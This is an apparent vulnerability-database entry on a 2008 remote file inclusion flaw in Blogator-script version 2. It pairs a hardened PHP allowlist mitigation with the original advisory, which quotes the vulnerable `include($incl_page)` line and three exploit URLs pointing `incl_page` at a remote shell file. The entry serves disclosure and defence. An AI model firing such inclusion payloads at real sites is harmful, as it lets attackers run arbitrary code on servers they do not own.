Vendor: Blogator-script
By: jiko
CVSS: 8.8 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Blogator-script
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:blogator-script:blogator-script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Blogator-script Remote File Inclusion Vulnerability

Blogator-script is prone to a remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application. Successful exploits can allow attackers to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Use input validation to prevent exploitation of this vulnerability: validate and sanitize the user-supplied `incl_page` value before it reaches `include()`, so that malicious files cannot be included.
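
The mitigation above, as an added example (not Blogator-script's own code or its patch): the `include($incl_page)` pattern replaced by an allowlist lookup. The page keys, the `pages/` directory and the function name `resolve_incl_page` are assumptions, and the code targets PHP 7.1 or later.

```php
<?php
// Added example: hardened replacement for `<? include($incl_page); ?>`.
// Page names and file layout below are assumptions, not Blogator-script's.

// Allowlist: request token => file on disk. Nothing else can be included.
const INCL_PAGES = [
    'home'     => 'pages/home.php',
    'articles' => 'pages/articles.php',
    'comments' => 'pages/comments.php',
];

function resolve_incl_page($requested): ?string
{
    // Reject arrays (?incl_page[]=x) and anything that is not a short token.
    // This alone rules out URLs, "../" sequences and NUL bytes.
    if (!is_string($requested)
        || !preg_match('/\A[a-z0-9_]{1,32}\z/', $requested)) {
        return null;
    }
    // The request value is only ever used as an array key, never as a path.
    if (!array_key_exists($requested, INCL_PAGES)) {
        return null;
    }
    // Defence in depth: the resolved file must exist and must still sit
    // under this directory (guards against a symlinked allowlist entry).
    $base = realpath(__DIR__);
    $path = realpath(__DIR__ . '/' . INCL_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from the query string instead of trusting
// a variable that the request may have populated.
$target = resolve_incl_page($_GET['incl_page'] ?? null);
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

Keeping `allow_url_include = Off` in `php.ini` (its default) is a second layer, since `include` then refuses `http://` targets regardless of what the script passes to it.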

Exploit-DB raw data:

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Blogator-script  Version 2
# Bug   : Remote File Inclusion
# Download  : http://www.blogator-script.com/telecharger.php
# file  : struct_admin.php & struct_admin_blog.php  & struct_main.php
# Error  :
   <? include($incl_page); ?>
=========================JIkI Team===================
# Exploit  :
 
  http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
=========================JIKI Team===================
 greetz : all my friend and H-T Team 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-04]